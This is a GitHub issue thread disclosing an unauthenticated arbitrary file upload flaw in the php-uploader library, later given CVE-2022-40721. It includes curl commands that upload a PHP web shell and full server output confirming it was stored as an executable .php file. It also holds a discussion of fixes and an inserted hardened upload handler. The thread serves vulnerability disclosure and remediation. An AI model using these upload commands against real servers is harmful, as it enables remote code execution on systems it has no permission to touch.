
Arbitrary file uploads

Open lcashdol opened this issue 6 years ago • 8 comments

By default, this code allows arbitrary file uploads to the web server's path. This will allow any unauthenticated user to upload a PHP file to the web server's path and execute it.

lcashdol avatar Feb 19 '19 18:02 lcashdol

curl -vk site/[path]/default/php/ajax_upload_file.php -F "[email protected]" -F "files=b.php" -F "upload_dir=dir"

bscript avatar Nov 26 '19 14:11 bscript

Hi, Which solution did you use to prevent this?

lenamtl avatar Aug 31 '22 13:08 lenamtl

You'd need to modify the code to either store uploaded files in a path not in the web root or filter what types of files are allowed to be uploaded.

lcashdol avatar Sep 07 '22 16:09 lcashdol

So will setting 'uploadDir' => null for the dir prevent this when called directly?

protected $options = array(
        'limit' => null,
        'maxSize' => null,
        'extensions' => array('JPG', 'jpg'), 
        'required' => false, 
        'uploadDir' => null,
        'title' => array('auto', 10),
        'removeFiles' => true,
        'perms' => null,
        'replace' => true,
        'onCheck' => null,
        'onError' => null,
        'onSuccess' => null,
        'onUpload' => null,
        'onComplete' => null,
        'onRemove' => null
    );

And how can this command be run from the browser, or how can I reproduce it so I can test the fix?

Thanks

lenamtl avatar Sep 09 '22 19:09 lenamtl

I'd make the uploadDir /var/tmp

lcashdol avatar Sep 14 '22 13:09 lcashdol
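The two mitigations proposed in this thread (an extension allowlist and an upload directory outside the web root) put together in one handler. This is an added example, not code from the php-uploader project; the storage path, the allowlist and the function name storeUpload are assumptions chosen for illustration, and the script serves the single "files" form field used in the curl examples above.

```php
<?php
// Added example (not the php-uploader project's code): a minimal hardened
// upload handler combining the mitigations discussed in this issue.
// Assumed names: STORAGE_DIR must lie outside DocumentRoot; ALLOWED maps each
// permitted extension to the MIME type its bytes must actually have.

declare(strict_types=1);

const STORAGE_DIR = '/var/tmp/php-uploader-storage'; // assumed path, not served by Apache
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png'];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate one $_FILES entry and move it to STORAGE_DIR under a random name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 */
function storeUpload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, error code ' . ($file['error'] ?? 'unknown'));
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Only accept a PHP-managed temp file, never a client-supplied path.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // 1. Extension allowlist, case-insensitive, judged on the last extension
    //    only: "shell.php" has no allowed extension and is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException("extension '$ext' not allowed");
    }

    // 2. Content check: $file['type'] comes from the client and is untrusted
    //    (the thread's output shows application/octet-stream for a .php file),
    //    so sniff the bytes with finfo and require the MIME type for that extension.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content type '$mime' does not match .$ext");
    }

    // 3. Server-chosen random name; the original file name never touches the filesystem.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;

    // 4. Destination outside the web root: even a file that passed the checks
    //    above cannot be requested, and therefore not executed, over HTTP.
    if (!is_dir(STORAGE_DIR) && !mkdir(STORAGE_DIR, 0750, true)) {
        throw new RuntimeException('cannot create storage directory');
    }
    $dest = STORAGE_DIR . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0640); // readable by the web user only, never executable
    return $stored;
}

// HTTP entry point for the "files" field; skipped when included from the CLI.
if (PHP_SAPI !== 'cli' && isset($_FILES['files'])) {
    header('Content-Type: application/json');
    try {
        echo json_encode(['stored' => storeUpload($_FILES['files'])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```

Because the stored files are not under DocumentRoot, they have to be handed back through a small read-only script (readfile with a fixed Content-Type) rather than by URL, which is the point: nothing a client uploads is ever reachable as an executable path.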

bscript's above exploit will work to test from the Linux command line.

lcashdol avatar Sep 19 '22 14:09 lcashdol

My exploit looked like this:

$ curl -vk http://localhost/php-uploader/examples/upload.php -F "[email protected]"
*   Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 80 (#0)
> POST /php-uploader/examples/upload.php HTTP/1.1
> Host: localhost
> User-Agent: curl/7.52.1
> Accept: */*
> Content-Length: 9376
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------9acb3f20a7222918
>
< HTTP/1.1 100 Continue
< HTTP/1.1 200 OK
< Date: Tue, 20 Sep 2022 16:15:13 GMT
< Server: Apache/2.4.25 (Debian)
< Vary: Accept-Encoding
< Content-Length: 734
< Content-Type: text/html; charset=UTF-8
<
Array
(
    [files] => Array
        (
            [0] => uploads/09ENdXG85W.php
        )

    [metas] => Array
        (
            [0] => Array
                (
                    [date] => Tue, 20 Sep 2022 12:15:13 -0400
                    [extension] => php
                    [file] => uploads/09ENdXG85W.php
                    [name] => 09ENdXG85W.php
                    [old_name] => shell.php
                    [replaced] => 
                    [size] => 9174
                    [size2] => 8.96 KB
                    [type] => Array
                        (
                            [0] => application
                            [1] => octet-stream
                        )

                )

        )

)
* Curl_http_done: called premature == 0
* Connection #0 to host localhost left intact

lcashdol avatar Sep 20 '22 16:09 lcashdol

I'm going to assign a CVE id of CVE-2022-40721 to track this.

lcashdol avatar Sep 20 '22 19:09 lcashdol